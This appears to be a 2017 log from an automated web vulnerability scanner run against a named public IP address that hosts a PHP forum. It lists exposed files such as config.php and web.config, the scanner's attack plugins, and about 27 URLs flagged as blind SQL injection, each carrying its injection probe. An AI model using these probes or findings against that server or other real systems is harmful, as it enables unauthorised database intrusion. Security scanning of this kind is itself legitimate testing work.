  1. Scan date: 12-4-2017 22:3:38
  2. ===================================================================================================
  3. | Domain: http://208.94.243.114/
  4. | Server: Apache/2.4.6 (CentOS) PHP/5.4.16
  5. | IP: 208.94.243.114
  6. ===================================================================================================
  7. |
  8. | Directory check:
  9. | [+] CODE: 200 URL: http://208.94.243.114/adm/
  10. | [+] CODE: 200 URL: http://208.94.243.114/icons/
  11. ===================================================================================================
  12. |
  13. | File check:
  14. | [+] CODE: 200 URL: http://208.94.243.114/config.php
  15. | [+] CODE: 200 URL: http://208.94.243.114/faq.php
  16. | [+] CODE: 200 URL: http://208.94.243.114/index.php
  17. | [+] CODE: 200 URL: http://208.94.243.114/search.php
  18. | [+] CODE: 200 URL: http://208.94.243.114/web.config
  19. ===================================================================================================
  20. |
  21. | Check robots.txt:
  22. |
  23. | Check sitemap.xml:
  24. ===================================================================================================
  25. |
  26. | Crawler Started:
  27. | Plugin name: Code Disclosure v.1.1 Loaded.
  28. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  29. | Plugin name: Upload Form Detect v.1.1 Loaded.
  30. | Plugin name: External Host Detect v.1.2 Loaded.
  31. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  32. | Plugin name: FCKeditor upload test v.1 Loaded.
  33. | Plugin name: E-mail Detection v.1.1 Loaded.
  34. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  35. | [+] Crawling finished, 616 URL's found!
  36. |
  37. | Source Code Disclosure:
  38. |
  39. | PHPinfo() Disclosure:
  40. |
  41. | File Upload Forms:
  42. |
  43. | External hosts:
  53. |
  54. | Timthumb:
  55. |
  56. | FCKeditor File Upload:
  57. |
  58. | E-mails:
  68. |
  69. | Web Backdoors:
  70. |
  71. | Ignored Files:
  99. ===================================================================================================
  100. | Dynamic tests:
  101. | Plugin name: Learning New Directories v.1.2 Loaded.
  102. | Plugin name: FCKedior tests v.1.1 Loaded.
  103. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  104. | Plugin name: Find Backup Files v.1.2 Loaded.
  105. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
  106. | Plugin name: Local File Include tests v.1.1 Loaded.
  107. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
  108. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  109. | Plugin name: Remote File Include tests v.1.2 Loaded.
  110. | Plugin name: SQL-injection tests v.1.2 Loaded.
  111. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
  112. | Plugin name: Web Shell Finder v.1.3 Loaded.
  113. | [+] 2 New directories added
  114. |
  115. |
  116. | FCKeditor tests:
  117. |
  118. |
  119. | Timthumb < 1.33 vulnerability:
  120. |
  121. |
  122. | Backup Files:
  123. |
  124. |
  125. | Blind SQL Injection:
  126. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=2'+AND+'1'='1
  127. | [+] Keyword: registered
  128. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=16'+AND+'1'='1
  129. | [+] Keyword: registered
  130. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?sid=1f3f5ae3d172f75e376fd5c36af8582d&search_id=active_topics'+AND+'1'='1
  131. | [+] Keyword: matches
  132. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=8cc8c7ac1c34471c1810e7c9d2710511&f=18'+AND+'1'='1
  133. | [+] Keyword: registered
  134. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sd=d&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=150&sk=t+AND+1=1
  135. | [+] Keyword: Stream
  136. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sk=t&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=100&sd=d+AND+1=1
  137. | [+] Keyword: looking
  138. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44618&sid=bbd0d2a0a0957a0bbf54d532db9fa735&start=15&f=1'+AND+'1'='1
  139. | [+] Keyword: registered
  140. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44791&sid=cd7d4db4c791c38fa9b4f38d01896aaa&f=2'+AND+'1'='1
  141. | [+] Keyword: registered
  142. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=15&sid=cd7d4db4c791c38fa9b4f38d01896aaa&t=44805'+AND+'1'='1
  143. | [+] Keyword: registered
  144. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=6&t=44781&sid=cd7d4db4c791c38fa9b4f38d01896aaa'+AND+'1'='1
  145. | [+] Keyword: registered
  146. | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=e2b85a78f29e9f444067f73b38c088d3'+AND+'1'='1
  147. | [+] Keyword: guests
  148. | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=447a43fcba19fbc64076a4c14cb3fe47+AND+1=1
  149. | [+] Keyword: guests
  150. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=1&t=44841&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  151. | [+] Keyword: topics
  152. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44840&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  153. | [+] Keyword: topics
  154. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44837&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  155. | [+] Keyword: topics
  156. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=17&t=44839&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  157. | [+] Keyword: topics
  158. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44826&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  159. | [+] Keyword: topics
  160. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44825&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  161. | [+] Keyword: topics
  162. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44820&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  163. | [+] Keyword: topics
  164. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=15&t=44805&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  165. | [+] Keyword: topics
  166. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=2&t=44791&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  167. | [+] Keyword: topics
  168. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44774&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  169. | [+] Keyword: topics
  170. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44781&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  171. | [+] Keyword: topics
  172. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44778&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  173. | [+] Keyword: topics
  174. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=25&t=44842&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  175. | [+] Keyword: topics
  176. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=40401&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  177. | [+] Keyword: topics
  178. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=19&t=43462&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  179. | [+] Keyword: topics
  180. |
  181. |
  182. | Local File Include:
  183. |
  184. |
  185. | PHP CGI Argument Injection:
  186. |
  187. |
  188. | Remote Command Execution:
  189. |
  190. |
  191. | Remote File Include:
  192. |
  193. |
  194. | SQL Injection:
  195. |
  196. |
  197. | Cross-Site Scripting (XSS):
  198. |
  199. |
  200. | Web Shell Finder:
  201. ===================================================================================================
  202. | Static tests:
  203. | Plugin name: Local File Include tests v.1.1 Loaded.
  204. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  205. | Plugin name: Remote File Include tests v.1.1 Loaded.
  206. |
  207. |
  208. | Local File Include:
  209. |
  210. |
  211. | Remote Command Execution:
  212. |
  213. |
  214. | Remote File Include:
  215. ===================================================================================================
  216. Scan end date: 13-4-2017 1:39:31